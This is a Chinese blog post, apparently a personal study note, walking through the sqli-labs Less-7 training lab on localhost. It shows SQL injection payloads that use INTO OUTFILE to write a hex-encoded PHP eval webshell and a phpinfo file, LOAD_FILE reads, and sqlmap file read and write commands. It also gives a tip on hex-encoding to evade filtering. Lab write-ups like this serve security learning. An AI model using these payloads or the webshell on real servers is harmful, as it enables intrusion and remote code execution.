<!DOCTYPE html><html><head><meta name="generator" content="Hexo 3.9.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="Sqlilabs通关笔记(7)读写注入"><meta name="keywords" content="SQL注入"><meta name="author" content="bb,shuiyue75381@gmail.com"><meta name="copyright" content="bb"><title>Sqlilabs通关笔记(7)读写注入【bb的博客】</title><link rel="stylesheet" href="/css/fan.css"><link rel="stylesheet" href="/css/thirdparty/jquery.mCustomScrollbar.min.css"><link rel="icon" href="/favicon.ico"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch.min.css"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch-theme-algolia.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4"></script><!--link(rel="dns-prefetch" href="https://cdn.jsdelivr.net")--><!--link(rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css")--><!--script(src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer)--><script>var isPassword = '' || false;
if (isPassword) {
    if (prompt('请输入文章密码') !== '') {
        alert('密码错误！');
        history.back();
    }
}</script><script>window.GLOBAL_CONFIG = {
  root: '/',
  algolia: {"appId":"X7RY6NGU4G","apiKey":"bf7ed65264918bbc03f12b4cc1212d85","indexName":"myblog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  }
}</script></head><body><canvas id="universe"></canvas><!--#body--><div id="sidebar"><div class="toggle-sidebar-info button-hover"><span data-toggle="文章目录">站点概览</span></div><div class="sidebar-toc"><div class="sidebar-toc-title">目录</div><div class="sidebar-toc-progress"><span class="progress-notice">您已阅读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc-progress-bar"></div></div><div class="sidebar-toc-content" id="sidebar-toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#第七关-基于文件写入注入"><span class="toc-number">1.</span> <span class="toc-text">第七关 基于文件写入注入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#存在注入点判断"><span class="toc-number">1.1.</span> <span class="toc-text">存在注入点判断</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#写入文件配置（使用条件）"><span class="toc-number">1.2.</span> <span class="toc-text">写入文件配置（使用条件）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#写入敏感文件"><span class="toc-number">1.3.</span> <span class="toc-text">写入敏感文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#读取敏感文件"><span class="toc-number">1.4.</span> <span class="toc-text">读取敏感文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQLMQP-读写文件"><span class="toc-number">1.5.</span> <span class="toc-text">SQLMQP 读写文件</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info-avatar"><img class="author-info-avatar-img" src="/avatar.png"></div><div class="author-info-name">bb</div><div class="author-info-description">This is myblog!</div><div class="links-buttons"><a class="links-button button-hover" href="https://github.com/bbkali" target="_blank">GitHub<i class="icon-dot bg-color0"></i></a><a class="links-button button-hover" href="mailto:shuiyue75381@gmail.com" target="_blank">E-Mail<i class="icon-dot bg-color9"></i></a><a class="links-button button-hover" href="tencent://message/?uin=1019593584&amp;Site=&amp;Menu=yes" target="_blank">QQ<i class="icon-dot bg-color6"></i></a></div><div class="author-info-articles"><a class="author-info-articles-archives article-meta" href="/archives"><span class="pull-top">日志</span><span class="pull-bottom">86</span></a><a class="author-info-articles-tags article-meta" href="/tags"><span class="pull-top">标签</span><span class="pull-bottom">66</span></a><a class="author-info-articles-categories article-meta" href="/categories"><span class="pull-top">分类</span><span class="pull-bottom">33</span></a></div></div></div><div id="main-container"><header><div id="menu-outer"><i class="menu-list-icon fas fa-bars"></i><nav id="menu-inner"><a class="menu-item" href="/">首页</a><a class="menu-item" href="/tags">标签</a><a class="menu-item" href="/categories">分类</a><a class="menu-item" href="/archives">归档</a><a class="menu-item" href="/about">关于</a></nav><div class="right-info"><a class="search social-icon"><i class="fas fa-search"></i><span> 搜索</span></a><a class="title-name" href="/">bb的博客</a><span id="now-time"></span></div></div></header><div id="content-outer"><div id="content-inner"><article id="post"><div class="post-header"><div class="title">Sqlilabs通关笔记(7)读写注入</div><div class="container"><time class="button-hover post-date"><i class="fas fa-calendar-alt article-icon" aria-hidden="true"></i> 发表于 2020-01-04 | 更新于 2020-02-06</time><!--time.button-hover.post-date #[i.fas.fa-calendar-alt.article-icon(aria-hidden="true")] #[=__('post.modified')] #[=date(page['updated'], config.date_format)]--><div class="button-hover categories"><i class="fa fa-inbox article-icon" aria-hidden="true"></i><a class="link-a" href="/categories/SQL注入/">SQL注入</a></div><div class="button-hover tags"><i class="fa fa-tag article-icon" aria-hidden="true"></i><a class="link-a" href="/tags/SQL注入/">SQL注入</a></div></div></div><div class="main-content"><h2 id="第七关-基于文件写入注入"><a href="#第七关-基于文件写入注入" class="headerlink" title="第七关 基于文件写入注入"></a>第七关 基于文件写入注入</h2><p><img src="https://raw.githubusercontent.com/bbkali/picbad/master/2020-1-5-8-11-29" alt="2020-1-5-8-11-29"></p>
<h3 id="存在注入点判断"><a href="#存在注入点判断" class="headerlink" title="存在注入点判断"></a>存在注入点判断</h3><ol>
<li>任意输入单引号，会显示报错</li>
<li>正常运行提示 Use outfile…… 所以理解为写入mm文件执行</li>
<li><p>通过尝试发现闭合’))，通过查看源代码，再次确定闭合成功</p>
 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">    $sql=&quot;SELECT * FROM users WHERE id=((&apos;$id&apos;)) LIMIT 0,1&quot;;</span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line">$row = mysql_fetch_array($result);</span><br><span class="line"></span><br><span class="line">    if($row)</span><br><span class="line">    &#123;</span><br><span class="line">    echo &apos;&lt;font color= &quot;#FFFF00&quot;&gt;&apos;;	</span><br><span class="line">    echo &apos;You are in.... Use outfile......&apos;;</span><br><span class="line">    echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">    echo &quot;&lt;/font&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">    else </span><br><span class="line">    &#123;</span><br><span class="line">    echo &apos;&lt;font color= &quot;#FFFF00&quot;&gt;&apos;;</span><br><span class="line">    echo &apos;You have an error in your SQL syntax&apos;;</span><br><span class="line">    //print_r(mysql_error());</span><br><span class="line">    echo &quot;&lt;/font&gt;&quot;;  </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">    else &#123; echo &quot;Please input the ID as parameter with numeric value&quot;;&#125;</span><br></pre></td></tr></table></figure>
</li>
</ol>
<a id="more"></a>
<h3 id="写入文件配置（使用条件）"><a href="#写入文件配置（使用条件）" class="headerlink" title="写入文件配置（使用条件）"></a>写入文件配置（使用条件）</h3><p><strong>secure-file-priv</strong></p>
<pre><code>- 如果文件导入不成功,确认Mysql配置文件my.ini下存在secure-file-priv
- secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的
</code></pre><ul>
<li>secure_file_priv的值为null ，表示限制mysqld不允许导入|导出</li>
<li>secure_file_priv的值为/tmp/ ，表示限制mysqld的导入|导出只能发生在/tmp/目录下</li>
<li>secure_file_priv的值没有具体值时，表示不对mysqld的导入|导出做限制</li>
</ul>
<p>mysql使用以下命令查看是否打开文件写入开关</p>
<blockquote>
<p>show global variables like ‘%secure%’</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/bbkali/picbad/master/2020-1-5-9-9-4" alt="2020-1-5-9-9-4"></p>
<p>修改my.ini添加secure-file-priv参数,没有填具体值表示不做限制(这样做其实很危险)<br><img src="https://raw.githubusercontent.com/bbkali/picbad/master/2020-1-5-9-9-20" alt="2020-1-5-9-9-20"></p>
<p>重启mysql即可</p>
<h3 id="写入敏感文件"><a href="#写入敏感文件" class="headerlink" title="写入敏感文件"></a>写入敏感文件</h3><p>写入一句话木马</p>
<blockquote>
<p><a href="http://127.0.0.1/sqlilabs2/Less-7/index.php?id=-1&#39;)" target="_blank" rel="noopener">http://127.0.0.1/sqlilabs2/Less-7/index.php?id=-1&#39;)</a>) union select 1,0x3c3f706870206576616c28245f504f53545b636d645d293b3f3e,3 into outfile “E:\softs\phpstudy_pro\WWW\sqlilabs2\Less-7\mm2.php”–+</p>
</blockquote>
<p>写入phpinfo</p>
<blockquote>
<p><a href="http://127.0.0.1/sqlilabs2/Less-7/index.php?id=1&#39;)" target="_blank" rel="noopener">http://127.0.0.1/sqlilabs2/Less-7/index.php?id=1&#39;)</a>) 1,0x3c3f70687020706870696e666f28293b3f3e,3 into outfile “E:\softs\phpstudy_pro\WWW\sqlilabs2\Less-7\pp2.php–+</p>
</blockquote>
<p><strong>写入需要注意的</strong></p>
<ul>
<li>写入的内容需要用hex转码，以防拦截</li>
<li>写入的前提需要知道物理文件路径</li>
<li>写入的前提是有权限写入，或者有配置写入的权限</li>
</ul>
<p><strong>可以在文件目录查看发现文件写入成功</strong></p>
<p><img src="https://raw.githubusercontent.com/bbkali/picbad/master/2020-1-5-9-9-49" alt="2020-1-5-9-9-49"></p>
<p><strong>同时网页可以直接访问该文件并执行</strong></p>
<p><img src="https://raw.githubusercontent.com/bbkali/picbad/master/2020-1-5-9-10-10" alt="2020-1-5-9-10-10"></p>
<h3 id="读取敏感文件"><a href="#读取敏感文件" class="headerlink" title="读取敏感文件"></a>读取敏感文件</h3><ul>
<li><strong>前提要有页面输出哦！</strong><blockquote>
<p><a href="http://127.0.0.1/sqlilabs2/Less-3/index.php?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqlilabs2/Less-3/index.php?id=-1&#39;</a>) union select 1,load_file(‘e:\mm.php’),3–+</p>
</blockquote>
</li>
</ul>
<h3 id="SQLMQP-读写文件"><a href="#SQLMQP-读写文件" class="headerlink" title="SQLMQP 读写文件"></a>SQLMQP 读写文件</h3><p><strong>文件读取</strong></p>
<blockquote>
<p>sqlmap -u “<a href="http://127.0.0.1/sqlilabs2/Less-1/index.php?id=1&quot;" target="_blank" rel="noopener">http://127.0.0.1/sqlilabs2/Less-1/index.php?id=1&quot;</a> –file-read “E:\mm.php”</p>
</blockquote>
<p><strong>文件写入</strong></p>
<blockquote>
<p>sqlmap -u “<a href="http://127.0.0.1/sqlilabs2/Less-7/index.php?id=1&quot;" target="_blank" rel="noopener">http://127.0.0.1/sqlilabs2/Less-7/index.php?id=1&quot;</a> –file-write “/home/bb/1.txt” –file-dest “E:\sql2.php” –batch</p>
</blockquote>
</div><div class="post-copyright"><div class="post-copyright-author"><span class="post-copyright-meta">本文作者: </span><span class="post-copyright-info"><a href="mailto:shuiyue75381@gmail.com">bb</a></span></div><div class="post-copyright-type"><span class="post-copyright-meta">本文链接: </span><span class="post-copyright-info"><a href="http://bbkali.github.io/2020/01/04/Sqlilabs通关笔记(7)读写注入/">http://bbkali.github.io/2020/01/04/Sqlilabs通关笔记(7)读写注入/</a></span></div><div class="post-copyright-notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://bbkali.github.io">bb的博客</a>！</span></div></div></article><div id="pagination"><div class="prev-post pull-left"><span class="line line-top"></span><span class="line line-right"></span><span class="line line-bottom"></span><span class="line line-left"></span><a href="/2020/01/04/Sqlilabs通关笔记(8-10)盲注/"><i class="fas fa-angle-left">&nbsp;</i><span>Sqlilabs通关笔记(8-10)盲注</span></a></div><div class="next-post pull-right"><span class="line line-top"></span><span class="line line-right"></span><span class="line line-bottom"></span><span class="line line-left"></span><a href="/2020/01/03/Sqlilabs通关笔记(5-6)报错注入/"><span>Sqlilabs通关笔记(5-6)报错注入</span><span>&nbsp;</span><i class="fas fa-angle-right"></i></a></div></div><!--div!= paginator()--></div></div><div class="button-hover" id="return-top"><i class="fas fa-arrow-up" aria-hidden="true"></i></div><footer><div id="footer"><div class="button-hover" id="side-button"><i class="fas fa-arrow-right"></i></div><div class="right-content"><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fas fa-file-o"></i></span><span id="busuanzi_value_page_pv"></span><span></span></div><div class="copyright">&copy;2019 ～ 2020 By bb</div></div></div></footer></div><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/jquery-3.3.1.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/velocity.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/jquery.mCustomScrollbar.concat.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/fan.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/canvas_bg.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/utils.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/scroll.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/sidebar.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/copy.js"></script><!--script(src=url)--><div class="search-dialog"><div id="algolia-search-title">Algolia</div><div class="search-close-button"><i class="fa fa-times"></i></div><!--div#current-refined-values--><!--div#clear-all--><div id="search-box"></div><!--div#refinement-list--><hr><div id="hits"></div><div id="algolia-pagination"></div></div><div class="search-mask"></div><script src="/js/search/algolia.js"></script></body></html>